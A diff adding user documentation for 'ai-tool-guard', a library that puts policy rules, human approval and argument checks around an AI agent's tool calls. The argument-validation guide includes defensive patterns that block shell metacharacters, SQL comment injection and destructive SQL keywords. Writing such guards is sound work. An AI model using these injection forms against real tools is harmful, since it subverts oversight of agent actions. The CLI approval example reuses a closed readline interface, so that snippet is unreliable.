b/docs/getting-started/quick-start.md @@ -0,0 +1,139 @@ +# Quick Start + +Get your first guarded tool running in 5 minutes. + +## Complete example + +The following example shows a minimal but complete integration of `ai-tool-guard` with the Vercel AI SDK. + +```ts +import { createToolGuard, defaultPolicy } from "ai-tool-guard"; +import { generateText, tool } from "ai"; +import { openai } from "@ai-sdk/openai"; +import { z } from "zod"; + +// 1. Define your tools as usual with the Vercel AI SDK. 
+const getWeather = tool({ + description: "Get the weather for a city", + parameters: z.object({ city: z.string() }), + execute: async ({ city }) => `Weather in ${city}: sunny, 72°F`, +}); + +const deleteUser = tool({ + description: "Delete a user account", + parameters: z.object({ userId: z.string() }), + execute: async ({ userId }) => `User ${userId} deleted`, +}); + +// 2. Create a guard with policy rules. +const guard = createToolGuard({ + rules: defaultPolicy(), + onApprovalRequired: async (token) => { + console.log(`Approval needed for ${token.toolName}:`, token.originalArgs); + return { approved: true, approvedBy: "admin" }; + }, + onDecision: (record) => { + console.log(`[${record.verdict}] ${record.toolName}: ${record.reason}`); + }, +}); + +// 3. Wrap tools with per-tool risk levels. +const tools = guard.guardTools({ + getWeather: { tool: getWeather, riskLevel: "low" }, + deleteUser: { tool: deleteUser, riskLevel: "high" }, +}); + +// 4. Use with AI SDK as normal. +const result = await generateText({ + model: openai("gpt-4o"), + tools, + prompt: "What's the weather in Tokyo?", +}); +``` + +## Step-by-step walkthrough + +### Step 1 — Define tools + +Define your tools exactly as you would without `ai-tool-guard`, using the Vercel AI SDK's `tool()` function. The guard wraps your tools non-destructively; your `execute` implementations remain unchanged. + +### Step 2 — Create a guard instance + +`createToolGuard()` accepts a configuration object with three main properties: + +**`rules`** + +A list of policy rules that determine what happens when a tool is called. `defaultPolicy()` provides a sensible baseline with the following behaviour: + +| Risk level | Default verdict | +|------------|-----------------| +| `low` | Allow immediately | +| `medium` | Require human approval | +| `high` | Deny | +| `critical` | Deny | + +You can replace or extend `defaultPolicy()` with your own rules. See [Policy Engine](../guides/policy-engine.md) for details. 
+ +**`onApprovalRequired`** + +An async callback invoked when a tool call requires approval before execution. The callback receives an approval token containing the tool name and original arguments. It must return an object with `{ approved: boolean, approvedBy: string }`. Return `{ approved: false }` to deny the call at runtime. + +This callback is your integration point for external approval systems — a Slack notification, an internal dashboard, or any other human-in-the-loop mechanism. + +**`onDecision`** + +A synchronous callback invoked after every policy evaluation. The decision record includes the tool name, the verdict (`allow`, `deny`, or `approve`), the reason string from the matching rule, and the sanitized arguments. Use this for audit logging, metrics, or debugging. + +### Step 3 — Wrap tools with risk levels + +`guard.guardTools()` accepts a map of named tool entries. Each entry pairs a tool definition with a `riskLevel` string that is used during policy evaluation. + +```ts +const tools = guard.guardTools({ + getWeather: { tool: getWeather, riskLevel: "low" }, + deleteUser: { tool: deleteUser, riskLevel: "high" }, +}); +``` + +The object returned by `guardTools()` is a plain `Record` that is fully compatible with the `tools` parameter of `generateText()`, `streamText()`, and other Vercel AI SDK functions. No adapter or conversion step is required. + +### Step 4 — Use with the AI SDK as normal + +Pass the wrapped tools to any Vercel AI SDK call. The guard middleware runs transparently inside each tool's `execute` function. From the SDK's perspective, the tools look identical to unguarded ones. + +```ts +const result = await generateText({ + model: openai("gpt-4o"), + tools, + prompt: "What's the weather in Tokyo?", +}); +``` + +## What just happened? 
+ +When the model invoked `getWeather` with `{ city: "Tokyo" }`, the following pipeline ran inside the guarded execute function: + +**Injection detection** +The raw arguments were scanned for prompt injection patterns before any policy rule was evaluated. Arguments that trigger injection heuristics are rejected before they reach your `execute` implementation. + +**Policy evaluation** +The rule list was evaluated in order. The first rule matching the tool name and risk level determined the verdict. + +**Verdict for `getWeather` (low risk)** +`defaultPolicy()` maps `low` to `allow`, so the call was permitted immediately and forwarded to your `execute` function without interruption. + +**Verdict for `deleteUser` (high risk)** +Had the model attempted to call `deleteUser`, `defaultPolicy()` would have mapped `high` to `deny`. The call would have been blocked and a denial reason returned to the model rather than executing the deletion. + +**Decision record emitted** +`onDecision` was called with the verdict, tool name, reason string, and sanitized arguments. This fires for every tool call regardless of outcome, giving you a complete audit trail. + +**OpenTelemetry spans** +If `@opentelemetry/api` is present in your project, `ai-tool-guard` automatically emits spans for each policy evaluation. No additional configuration is required. 
+ +## Next steps + +- [Core Concepts](concepts.md) — understand the mental model behind guards, rules, and verdicts +- [Policy Engine](../guides/policy-engine.md) — write custom rules tailored to your application +- [Argument Validation](../guides/argument-validation.md) — validate and sanitize tool inputs before execution +- [Approval Workflows](../guides/approval-workflows.md) — implement human-in-the-loop approval for sensitive operations diff --git a/docs/guides/approval-workflows.md b/docs/guides/approval-workflows.md new file mode 100644 index 0000000..230e7c4 --- /dev/null +++ b/docs/guides/approval-workflows.md @@ -0,0 +1,248 @@ +# Approval Workflows + +When the policy engine returns `"require-approval"` for a tool call, `ai-tool-guard` pauses execution and invokes your `ApprovalHandler`. The handler receives a signed token describing the pending call and must return a resolution — approved, denied, or approved with modified arguments. + +## Overview + +The approval flow involves three types: + +| Type | Role | +|---|---| +| `ApprovalToken` | Describes the pending tool call. Created by `ApprovalManager` and passed to your handler. | +| `ApprovalResolution` | Your handler's response: approve, deny, or approve with patched arguments. | +| `ApprovalHandler` | Your callback function: `(token: ApprovalToken) => Promise`. | + +The `ApprovalManager` class manages the full lifecycle: creating tokens, tracking pending requests, enforcing TTL expiry, and merging patched arguments into the final call. 
+ +## Basic Usage + +Register an `ApprovalHandler` via `onApprovalRequired` in your guard configuration: + +```ts +import { createToolGuard, defaultPolicy } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: defaultPolicy(), + onApprovalRequired: async (token) => { + console.log(`Approval requested for "${token.toolName}"`); + console.log("Arguments:", token.originalArgs); + console.log("Token ID:", token.id); + console.log("Payload hash:", token.payloadHash); + + // Simple synchronous approval for illustration. + return { + approved: true, + approvedBy: "admin@example.com", + }; + }, +}); +``` + +To deny a call from the handler, return `{ approved: false }` with an optional `reason`: + +```ts +onApprovalRequired: async (token) => { + return { + approved: false, + reason: "Request rejected by the on-call operator.", + }; +}, +``` + +## Configuration Options + +### `ApprovalToken` + +The token is created by `ApprovalManager` and passed read-only to your handler. + +| Field | Type | Description | +|---|---|---| +| `id` | `string` | Random unique identifier for this approval request. | +| `payloadHash` | `string` | SHA-256 hash of `{ toolName, args }` (canonicalised). Used for correlation and tamper detection. | +| `toolName` | `string` | Name of the tool awaiting approval. | +| `originalArgs` | `Record` | Deep clone of the arguments the model supplied. | +| `createdAt` | `string` | ISO-8601 timestamp of token creation. | +| `ttlMs` | `number \| undefined` | Token expiry window in milliseconds. Default is 5 minutes (300 000 ms). | + +### `ApprovalResolution` + +Return this object from your handler. + +| Field | Type | Required | Description | +|---|---|---|---| +| `approved` | `boolean` | Yes | Whether the call is approved. | +| `patchedArgs` | `Record` | No | Partial argument overrides. Merged with `originalArgs`; keys in `patchedArgs` take precedence. 
| +| `approvedBy` | `string` | No | Identity of the approver, written to the decision record for audit. | +| `reason` | `string` | No | Human-readable reason, used when `approved` is `false`. | + +### `ApprovalManager` + +`ApprovalManager` is the class that orchestrates the flow internally. You do not instantiate it directly — the guard creates one from your `onApprovalRequired` callback. Its public surface is useful when building approval UIs: + +```ts +class ApprovalManager { + constructor(handler: ApprovalHandler, defaultTtlMs?: number); + + /** Create a token and invoke the handler. Returns the final flow result. */ + requestApproval(ctx: PolicyContext): Promise; + + /** Read-only snapshot of pending tokens (useful for dashboards). */ + getPendingTokens(): ReadonlyArray; +} +``` + +## Advanced Examples + +### Slack-Based Approval + +Route approval requests through a Slack message. The handler sends a message, then polls for a response via a shared in-memory map updated by a Slack webhook endpoint: + +```ts +import type { ApprovalHandler, ApprovalResolution } from "ai-tool-guard"; + +// Map populated by your /slack/actions webhook handler. +const pendingSlackResponses = new Map(); + +const slackApprovalHandler: ApprovalHandler = async (token) => { + // Post a message to the approvals channel. + await postSlackMessage({ + channel: "#tool-approvals", + text: `Tool call requires approval`, + blocks: [ + { + type: "section", + text: { + type: "mrkdwn", + text: `*Tool:* \`${token.toolName}\`\n*Args:* \`\`\`${JSON.stringify(token.originalArgs, null, 2)}\`\`\``, + }, + }, + { + type: "actions", + elements: [ + { type: "button", text: { type: "plain_text", text: "Approve" }, value: token.id, action_id: "approve_tool" }, + { type: "button", text: { type: "plain_text", text: "Deny" }, value: token.id, action_id: "deny_tool", style: "danger" }, + ], + }, + ], + }); + + // Poll for a response until TTL elapses. + const deadline = Date.now() + (token.ttlMs ?? 
300_000); + while (Date.now() < deadline) { + const resolution = pendingSlackResponses.get(token.id); + if (resolution) { + pendingSlackResponses.delete(token.id); + return resolution; + } + await new Promise((resolve) => setTimeout(resolve, 2_000)); + } + + return { approved: false, reason: "Approval request timed out." }; +}; + +// In your Slack webhook route: +// app.post("/slack/actions", (req, res) => { +// const payload = JSON.parse(req.body.payload); +// const action = payload.actions[0]; +// pendingSlackResponses.set(action.value, { +// approved: action.action_id === "approve_tool", +// approvedBy: payload.user.name, +// }); +// res.send(); +// }); +``` + +### Approve with Edits (patchedArgs) + +An approver can modify the arguments before the tool executes. Patched fields are merged shallowly with the original arguments and recorded in `ApprovalFlowResult.patchedFields`: + +```ts +import type { ApprovalHandler } from "ai-tool-guard"; + +const editingApprovalHandler: ApprovalHandler = async (token) => { + // Suppose the model tried to delete all records; an operator limits the scope. + if (token.toolName === "db.deleteRecords") { + const originalQuery = token.originalArgs["query"] as string; + + if (originalQuery === "*") { + // Approve, but rewrite the wildcard to a safe test scope. + return { + approved: true, + approvedBy: "dba@example.com", + patchedArgs: { + query: "status = 'test'", + limit: 100, + }, + }; + } + } + + return { approved: true, approvedBy: "auto-approver" }; +}; +``` + +After the handler returns, `ApprovalManager` merges `patchedArgs` over `originalArgs`: + +```ts +const finalArgs = { ...token.originalArgs, ...resolution.patchedArgs }; +``` + +The merged `finalArgs` are used for the actual tool execution. The original arguments are never mutated. 
+ +### CLI Prompt Approval + +For command-line tools and scripts, prompt the operator interactively using Node's `readline` module: + +```ts +import * as readline from "node:readline/promises"; +import { stdin as input, stdout as output } from "node:process"; +import type { ApprovalHandler } from "ai-tool-guard"; + +const cliApprovalHandler: ApprovalHandler = async (token) => { + const rl = readline.createInterface({ input, output }); + + console.log(`\n--- Approval Required ---`); + console.log(`Tool: ${token.toolName}`); + console.log(`Arguments: ${JSON.stringify(token.originalArgs, null, 2)}`); + console.log(`Token ID: ${token.id}`); + console.log(`Hash: ${token.payloadHash}`); + + const answer = await rl.question("\nApprove? [y/N] "); + rl.close(); + + if (answer.trim().toLowerCase() === "y") { + const approver = await rl.question("Your name: "); + rl.close(); + return { approved: true, approvedBy: approver.trim() }; + } + + return { approved: false, reason: "Denied at CLI prompt." }; +}; +``` + +## How It Works + +The internal flow, implemented in `src/approval/manager.ts`, runs as follows: + +1. **Token creation** — `requestApproval(ctx)` computes a SHA-256 hash of the canonicalised `{ toolName, args }` payload. This `payloadHash` ties the token to the exact tool call; any tampering with the arguments after token creation is detectable via hash mismatch. + +2. **Token registration** — The token is stored in an in-memory `Map` keyed by `token.id`. `getPendingTokens()` exposes a read-only snapshot of this map for UI display. + +3. **Handler invocation** — Your `ApprovalHandler` is called with the token. The manager awaits the returned `Promise`. + +4. **TTL check** — When the resolution arrives, the manager checks whether `Date.now() - createdAt > ttlMs`. Expired tokens return an error result with `approved: false` regardless of what the handler returned. + +5. 
**Argument patching** — If `resolution.patchedArgs` is non-empty, it is shallow-merged over `token.originalArgs`. The merged result becomes the `args` field of `ApprovalFlowResult`. + +6. **Token cleanup** — The token is removed from the pending map in the `finally` block of `requestApproval`, ensuring cleanup even if the handler throws. + +!!! info "Payload hash correlation" + The `payloadHash` (SHA-256 of the canonical `{ toolName, args }` JSON) lets downstream systems — approval UIs, audit logs, Slack bots — verify that the call they are approving matches exactly what the policy engine originally evaluated. Store and display it alongside approval records. + +!!! warning "TTL is enforced server-side" + The 5-minute default TTL is enforced by the manager when the resolution arrives, not when the token is created. A handler that blocks for longer than the TTL will have its resolution rejected. Set a custom TTL via the `defaultTtlMs` constructor parameter when instantiating `ApprovalManager` directly, or accept the 300 000 ms default. + +## Related + +- [API Reference](../api/approval.md) — full type documentation for `ApprovalToken`, `ApprovalResolution`, `ApprovalHandler`, and `ApprovalFlowResult`. +- [Error Handling](error-handling.md) — how denied and errored approvals are surfaced to the caller. diff --git a/docs/guides/argument-validation.md b/docs/guides/argument-validation.md new file mode 100644 index 0000000..c83c9c8 --- /dev/null +++ b/docs/guides/argument-validation.md @@ -0,0 +1,324 @@ +# Argument Validation + +Argument guards intercept tool calls before policy evaluation and inspect the raw arguments the model supplies. They let you enforce schemas, restrict values to known-safe sets, block forbidden values, scan for PII, and apply any custom logic — all without modifying your tool implementations. + +## Overview + +Every argument guard is evaluated by `evaluateArgGuards` before the policy engine runs. 
If any guard returns a violation, the tool call is blocked and a structured list of violations is returned to the caller. Guards are composable: attach as many as needed to a single tool. + +Guards target individual fields via dot-path strings (`"query"`, `"config.region"`) or the entire args object via the wildcard `"*"`. + +## Basic Usage + +Attach guards to a tool using the `argGuards` array on `ToolGuardConfig`: + +```typescript +import { createToolGuard } from "ai-tool-guard"; +import { allowlist, denylist, piiGuard, zodGuard } from "ai-tool-guard/guards"; +import { z } from "zod"; + +const guard = createToolGuard({ + rules: [{ id: "allow-all", toolPatterns: ["*"], verdict: "allow" }], +}); + +const wrappedQuery = guard.guardTool("myDbQuery", myDbQueryTool, { + riskLevel: "high", + argGuards: [ + zodGuard({ field: "limit", schema: z.number().int().min(1).max(1000) }), + allowlist("database", ["analytics", "reporting"]), + piiGuard("query"), + ], +}); +``` + +When a guard blocks a call, the engine emits a `ToolGuardError` with `code: "arg-guard-failed"` and includes the full violations list. The corresponding `DecisionRecord` carries the same detail. + +## Configuration Options + +### `zodGuard({ field, schema })` + +Validates a single field against any Zod schema. The `schema` can be any `z.ZodType`, including objects, unions, and refinements. When validation fails, the error message includes all Zod issue messages joined with semicolons. + +```typescript +import { zodGuard } from "ai-tool-guard/guards"; +import { z } from "zod"; + +// Reject calls where `limit` is not a positive integer under 1000. +zodGuard({ + field: "limit", + schema: z.number().int().positive().max(1000), +}); + +// Validate a nested object field. 
+zodGuard({ + field: "options", + schema: z.object({ + format: z.enum(["json", "csv"]), + compress: z.boolean().optional(), + }), +}); +``` + +### `allowlist(field, allowed)` + +Blocks calls where the field value is not present in the provided array. Uses strict equality (`===`). + +```typescript +import { allowlist } from "ai-tool-guard/guards"; + +// Only allow writes to known environments. +allowlist("environment", ["staging", "canary"]); + +// Restrict database selection using a dot-path. +allowlist("config.database", ["analytics", "reporting", "logs"]); +``` + +### `denylist(field, denied)` + +Blocks calls where the field value appears in the denied array. The logical inverse of `allowlist`. + +```typescript +import { denylist } from "ai-tool-guard/guards"; + +// Prevent reads from sensitive tables. +denylist("table", ["users_pii", "payment_methods", "audit_log"]); + +// Block dangerous SQL operation types. +denylist("operation", ["DROP", "TRUNCATE", "ALTER"]); +``` + +### `regexGuard(field, pattern, opts?)` + +Validates that a string field matches (or does not match) a regular expression. + +| Option | Type | Default | Description | +|---|---|---|---| +| `mustMatch` | `boolean` | `true` | When `true`, the value must match the pattern. When `false`, a match is a violation. | +| `message` | `string` | built-in | Custom violation message returned to the caller. | + +```typescript +import { regexGuard } from "ai-tool-guard/guards"; + +// Value must look like a valid S3 bucket name. +regexGuard("bucket", /^[a-z0-9][a-z0-9\-]{1,61}[a-z0-9]$/, { + mustMatch: true, + message: 'Invalid S3 bucket name in "bucket".', +}); + +// Value must NOT contain shell metacharacters. +regexGuard("filename", /[;&|`$<>]/, { + mustMatch: false, + message: "Shell metacharacters are not allowed in filenames.", +}); +``` + +`regexGuard` returns a type error if the field value is not a string. + +### `piiGuard(field, opts?)` + +Scans a string value for common PII patterns. 
Blocks the call if any pattern is detected, unless the type is listed in `allowedTypes`. + +Detected PII types: + +| Type | Description | +|---|---| +| `email` | Standard email address format | +| `ssn` | US Social Security Number (`NNN-NN-NNNN`) | +| `credit-card` | Visa, Mastercard, Amex, Discover — with Luhn checksum validation | +| `phone-us` | North American Numbering Plan phone numbers | +| `ip-address` | IPv4 addresses | + +```typescript +import { piiGuard } from "ai-tool-guard/guards"; + +// Reject any PII in a free-text query field. +piiGuard("query"); + +// Allow email addresses but block all other PII types. +piiGuard("recipient", { allowedTypes: ["email"] }); +``` + +Credit card numbers are validated against the Luhn algorithm before a violation is raised. This eliminates false positives from numeric strings that happen to match the card number format but are not valid card numbers. + +### Dot-path Field Access + +The `field` string uses dot notation to address nested argument properties: + +```typescript +// Accesses args.config.region +allowlist("config.region", ["us-east-1", "eu-west-1"]); + +// Accesses args.user.email +piiGuard("user.email", { allowedTypes: ["email"] }); +``` + +Traversal stops safely if any intermediate property is `null` or not an object. In that case the guard receives `undefined`. Most built-in guards treat `undefined` as a pass for optional fields; `zodGuard` applies the Zod schema and may reject it depending on whether the schema marks the field as required. + +### Wildcard Field `"*"` + +Setting `field: "*"` passes the entire `args` object — rather than a single field — to the `validate` function. 
Use this for cross-field rules or full-args inspection: + +```typescript +import type { ArgGuard } from "ai-tool-guard"; + +const noEmptyArgs: ArgGuard = { + field: "*", + validate(args) { + if (!args || Object.keys(args as object).length === 0) { + return "Tool called with no arguments."; + } + return null; + }, +}; +``` + +### Custom `ArgGuard` Interface + +Implement `ArgGuard` directly for any logic not covered by the built-ins: + +```typescript +import type { ArgGuard, PolicyContext } from "ai-tool-guard"; + +const domainAllowlistGuard: ArgGuard = { + field: "url", + async validate(value: unknown, ctx: PolicyContext): Promise<string | null> { + if (typeof value !== "string") return null; + const url = new URL(value); + const allowed = (ctx.userAttributes.allowedDomains as string[]) ?? []; + if (!allowed.includes(url.hostname)) { + return `Domain "${url.hostname}" is not in your approved list.`; + } + return null; + }, +}; +``` + +The `validate` function signature is: + +```typescript +validate(value: unknown, ctx: PolicyContext): string | null | Promise<string | null> +``` + +Return a non-null string to block the call with that message. Return `null` to pass. + +### `evaluateArgGuards(guards, ctx)` + +The runner function that executes all guards and collects results: + +```typescript +import { evaluateArgGuards } from "ai-tool-guard/guards"; + +const result = await evaluateArgGuards(guards, ctx); +// result.passed — true if no violations +// result.violations — Array<{ field: string; message: string }> +``` + +Guards are always run to completion — all guards are evaluated even after a violation is found, so a single call can surface multiple violations at once.
+ +## Advanced Examples + +### Securing a Database Query Tool + +Layer multiple guards to enforce types, restrict targets, and prevent PII leakage in query text: + +```typescript +import { createToolGuard } from "ai-tool-guard"; +import { + allowlist, + denylist, + piiGuard, + regexGuard, + zodGuard, +} from "ai-tool-guard/guards"; +import { z } from "zod"; + +const guard = createToolGuard(); + +const wrappedDbQuery = guard.guardTool("dbQuery", dbQueryTool, { + riskLevel: "high", + riskCategories: ["data-read"], + argGuards: [ + // Only allow queries against known read replicas. + allowlist("database", ["analytics_ro", "reporting_ro"]), + + // Restrict result size to prevent unbounded reads. + zodGuard({ + field: "limit", + schema: z.number().int().min(1).max(500), + }), + + // Block queries that reference internal schema tables. + denylist("table", ["pg_catalog", "information_schema"]), + + // Ensure query strings don't accidentally carry PII + // (e.g., a user email embedded in a search filter). + piiGuard("query"), + + // Prevent SQL comment injection. + regexGuard("query", /--/, { + mustMatch: false, + message: "SQL comments are not permitted in query arguments.", + }), + ], +}); +``` + +### Context-Aware Guard Using User Attributes + +Guards receive the full `PolicyContext`, including `userAttributes`. Use this to apply per-tenant restrictions: + +```typescript +import type { ArgGuard } from "ai-tool-guard"; + +const tenantScopedRegionGuard: ArgGuard = { + field: "region", + validate(value, ctx) { + const allowed = ctx.userAttributes.allowedRegions as string[] | undefined; + if (!allowed) return null; // No restriction configured for this tenant. 
+ if (!allowed.includes(value as string)) { + return `Region "${value}" is not permitted for your account.`; + } + return null; + }, +}; +``` + +### Cross-Field Validation with the Wildcard Guard + +Use `field: "*"` when a rule requires inspecting multiple arguments together: + +```typescript +import type { ArgGuard } from "ai-tool-guard"; + +const exportSizeGuard: ArgGuard = { + field: "*", + validate(args) { + const a = args as { limit?: number; includeAttachments?: boolean }; + if (a.includeAttachments && (a.limit ?? 0) > 100) { + return ( + "Cannot export more than 100 records when includeAttachments is true." + ); + } + return null; + }, +}; +``` + +## How It Works + +1. `evaluateArgGuards` iterates over the guards array in declaration order. +2. For each guard, the field value is extracted from `ctx.args` using dot-path traversal, or the entire `args` object is passed for `"*"`. +3. `guard.validate(value, ctx)` is called and awaited. +4. Any non-null return value is recorded as a `{ field, message }` violation. +5. After all guards run, the result is `{ passed: boolean, violations: Array<{ field: string; message: string }> }`. +6. If `passed` is `false`, the engine blocks the call, emits a denied `DecisionRecord`, and throws `ToolGuardError`. + +!!! note "Guards do not short-circuit" + All guards always run to completion. This means a single blocked call can report violations from multiple guards simultaneously, which is useful for surfacing all problems to the caller in one round trip. 
+ +## Related + +- [API Reference — Guards](../api/guards.md) +- [Injection Detection](injection-detection.md) +- [Output Filtering](output-filtering.md) +- [Decision Records](decision-records.md) diff --git a/docs/guides/conversation-aware-policies.md b/docs/guides/conversation-aware-policies.md new file mode 100644 index 0000000..5ff4869 --- /dev/null +++ b/docs/guides/conversation-aware-policies.md @@ -0,0 +1,278 @@ +# Conversation-Aware Policies + +## Overview + +Standard policy rules evaluate each tool call in isolation using the tool name, arguments, and static user attributes. Conversation-aware policies extend this by making session-level state available to rule conditions — things like how many tool failures have occurred in the current conversation, what risk score has accumulated, or which tools have already been approved by a human operator in this session. + +This enables dynamic policy behavior: restrictions that escalate after repeated failures, tools that become available only after an initial approval, or risk scoring that tightens access as a session accumulates suspicious patterns. + +--- + +## Basic Usage + +Provide a `resolveConversationContext` callback in `createToolGuard`. It is called before every policy evaluation and may return a plain `ConversationContext` object or a `Promise<ConversationContext>`: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import type { ConversationContext } from 'ai-tool-guard'; + +const guard = createToolGuard({ + rules: [...], + resolveConversationContext: async (): Promise<ConversationContext> => { + // Fetch session state from your session store or in-memory map. + const session = await sessionStore.get(currentSessionId); + return { + sessionId: session.id, + riskScore: session.riskScore, + priorFailures: session.failureCount, + recentApprovals: session.approvedTools, + }; + }, +}); +``` + +The returned `ConversationContext` is attached to `PolicyContext.conversation` and is accessible inside any rule `condition` function.
+ +--- + +## `ConversationContext` Fields + +```typescript +interface ConversationContext { + /** Unique conversation or session identifier. */ + sessionId?: string; + /** Accumulated risk score for the session. Range is application-defined. */ + riskScore?: number; + /** Number of tool failures (errors, denials) in the current conversation. */ + priorFailures?: number; + /** Tool names that a human has explicitly approved earlier in this session. */ + recentApprovals?: string[]; + /** Arbitrary application-specific key-value state. */ + metadata?: Record<string, unknown>; +} +``` + +| Field | Type | Description | +|---|---|---| +| `sessionId` | `string` | Identifies the conversation for logging and correlation. | +| `riskScore` | `number` | A numeric score you maintain and update as the session progresses. Interpretation is entirely application-defined. | +| `priorFailures` | `number` | Count of failed or denied tool calls in the session. Useful for progressive lockdown. | +| `recentApprovals` | `string[]` | Tool names approved by a human operator. Lets you relax subsequent checks for already-reviewed tools. | +| `metadata` | `Record<string, unknown>` | Escape hatch for any session state that does not fit the other fields. | + +--- + +## Accessing Conversation Context in Rules + +Inside a rule's `condition` function, conversation state is available via `ctx.conversation`: + +```typescript +import type { PolicyRule } from 'ai-tool-guard'; + +const rule: PolicyRule = { + id: 'escalate-on-failures', + description: 'Deny all high-risk tools if 3+ failures have occurred.', + toolPatterns: ['*'], + riskLevels: ['high', 'critical'], + verdict: 'deny', + condition: (ctx) => { + const failures = ctx.conversation?.priorFailures ?? 0; + return failures >= 3; + }, +}; +``` + +`ctx.conversation` is `undefined` when no `resolveConversationContext` callback is configured, so defensive access with `?.` and a fallback default is recommended.
+ +The full `PolicyContext` shape: + +```typescript +interface PolicyContext { + toolName: string; + args: Record<string, unknown>; + userAttributes: Record<string, unknown>; + conversation?: ConversationContext; // Available when callback is set. + dryRun?: boolean; +} +``` + +--- + +## Use Cases + +### Escalating Restrictions After Failures + +Lock down high-risk tools automatically when a session accumulates too many failures, reducing the blast radius of a compromised or confused agent: + +```typescript +const guard = createToolGuard({ + rules: [ + { + id: 'progressive-lockdown', + toolPatterns: ['*'], + riskLevels: ['high', 'critical'], + verdict: 'deny', + priority: 10, + condition: (ctx) => (ctx.conversation?.priorFailures ?? 0) >= 3, + }, + ], + resolveConversationContext: () => sessionState.get(currentSessionId), +}); +``` + +### Session-Based Risk Scoring + +Compute a risk score from the agent's recent behavior and use it to gate access to sensitive tools: + +```typescript +const guard = createToolGuard({ + rules: [ + { + id: 'high-risk-score-block', + toolPatterns: ['*'], + riskLevels: ['medium', 'high', 'critical'], + verdict: 'require-approval', + condition: (ctx) => (ctx.conversation?.riskScore ?? 0) > 0.7, + }, + ], + resolveConversationContext: async () => { + const score = await riskScorer.getScore(currentSessionId); + return { riskScore: score }; + }, +}); +``` + +### Unlocking Tools After Human Approval + +Once a human approves a sensitive tool call in a session, allow subsequent calls to that tool without re-prompting: + +```typescript +const guard = createToolGuard({ + rules: [ + { + id: 'require-first-approval', + toolPatterns: ['sendEmail', 'postToSlack'], + verdict: 'require-approval', + condition: (ctx) => { + const approved = ctx.conversation?.recentApprovals ?? []; + // Skip approval if this tool was already approved this session.
+ return !approved.includes(ctx.toolName); + }, + }, + ], + resolveConversationContext: () => ({ + recentApprovals: approvedToolsCache.get(currentSessionId) ?? [], + }), + onApprovalRequired: async (token) => { + const resolution = await showApprovalModal(token); + if (resolution.approved) { + // Record the approval so future calls skip the modal. + approvedToolsCache.add(currentSessionId, token.toolName); + } + return resolution; + }, +}); +``` + +--- + +## Advanced Examples + +### Progressive Lockdown with Auto-Recovery + +Escalate restrictions as failures accumulate, but reset after a cool-down period using `metadata`: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; + +const guard = createToolGuard({ + rules: [ + { + id: 'lockdown-after-failures', + toolPatterns: ['*'], + riskLevels: ['high', 'critical'], + verdict: 'deny', + priority: 20, + condition: (ctx) => { + const failures = ctx.conversation?.priorFailures ?? 0; + const lockedUntil = ctx.conversation?.metadata?.lockedUntil as number | undefined; + if (lockedUntil && Date.now() < lockedUntil) { + return true; // Still in lockdown period. + } + return failures >= 5; + }, + }, + ], + resolveConversationContext: async () => { + const session = await sessionStore.get(currentSessionId); + return { + priorFailures: session.failures, + metadata: { + lockedUntil: session.lockedUntil, + }, + }; + }, + onDecision: async (record) => { + if (record.verdict === 'deny') { + await sessionStore.incrementFailures(currentSessionId); + if ((await sessionStore.getFailures(currentSessionId)) >= 5) { + // Lock the session for 15 minutes. 
+ await sessionStore.setLockedUntil( + currentSessionId, + Date.now() + 15 * 60 * 1000, + ); + } + } + }, +}); +``` + +### Trusted Session Relaxation + +Allow additional capabilities once a session has demonstrated trustworthy behavior through a series of approved low-risk calls: + +```typescript +const guard = createToolGuard({ + rules: [ + { + id: 'trusted-session-expanded-access', + toolPatterns: ['exportReport', 'bulkUpdate'], + verdict: 'allow', + priority: 15, // Higher priority than the default deny rules below. + condition: (ctx) => { + const approvals = ctx.conversation?.recentApprovals ?? []; + // Require that at least 3 different tools have been reviewed this session. + return approvals.length >= 3; + }, + }, + { + id: 'default-deny-bulk-ops', + toolPatterns: ['exportReport', 'bulkUpdate'], + verdict: 'require-approval', + }, + ], + resolveConversationContext: () => ({ + recentApprovals: sessionApprovals.get(currentSessionId) ?? [], + }), +}); +``` + +--- + +## How It Works + +1. Before each tool invocation, `ToolGuard` calls `resolveConversationContext()` if configured and awaits the result. +2. The returned `ConversationContext` is merged into the `PolicyContext` as the `conversation` field. +3. The full `PolicyContext` — including `conversation` — is passed to every policy rule's `condition` function. +4. Rules can read any field from `ctx.conversation` to make contextual decisions. The context is read-only from within a rule; mutations to the returned object do not affect the session store. +5. After the evaluation, `resolveConversationContext` is called again on the next invocation — the callback is responsible for reading fresh state each time. + +!!! tip + Keep `resolveConversationContext` fast. The guard awaits it inline in the execution pipeline before the policy engine runs, so its latency is added to every tool call. Use in-memory caches or lightweight lookups rather than database queries where possible.
+ +--- + +## Related + +- [Policy Engine](policy-engine.md) +- [API Reference — Types](../api/types.md) diff --git a/docs/guides/decision-records.md b/docs/guides/decision-records.md new file mode 100644 index 0000000..bf6e405 --- /dev/null +++ b/docs/guides/decision-records.md @@ -0,0 +1,308 @@ +# Decision Records + +## Overview + +Every tool call evaluation — whether it results in `allow`, `deny`, or `require-approval` — produces a `DecisionRecord`. This record is the primary observability artifact of ai-tool-guard. It captures the full context of the decision: which rules matched, what risk classifications applied, how long evaluation took, whether output was redacted, and a human-readable reason for the verdict. + +Decision records are delivered via the `onDecision` callback in `GuardOptions`. They are also attached to `ToolGuardError` instances for policy-originated errors, and they map directly to OTel span attributes for trace-level visibility. + +--- + +## The `DecisionRecord` Interface + +```typescript +interface DecisionRecord { + /** UUIDv4 identifier for this decision. Use for correlation across logs, spans, and alerts. */ + id: string; + /** ISO-8601 timestamp of when the decision was made. */ + timestamp: string; + /** The policy verdict: "allow", "deny", or "require-approval". */ + verdict: DecisionVerdict; + /** Name of the tool that was evaluated. */ + toolName: string; + /** IDs of all policy rules that matched and influenced the verdict. */ + matchedRules: string[]; + /** Risk level assigned to the tool at evaluation time. */ + riskLevel: RiskLevel; + /** Risk categories that applied to this tool call. */ + riskCategories: RiskCategory[]; + /** Caller-supplied attributes available to the policy engine (user roles, tenant, etc.). */ + attributes: Record<string, unknown>; + /** Human-readable explanation of the verdict. */ + reason: string; + /** Field names redacted by output filters, if any. Present only when redaction occurred.
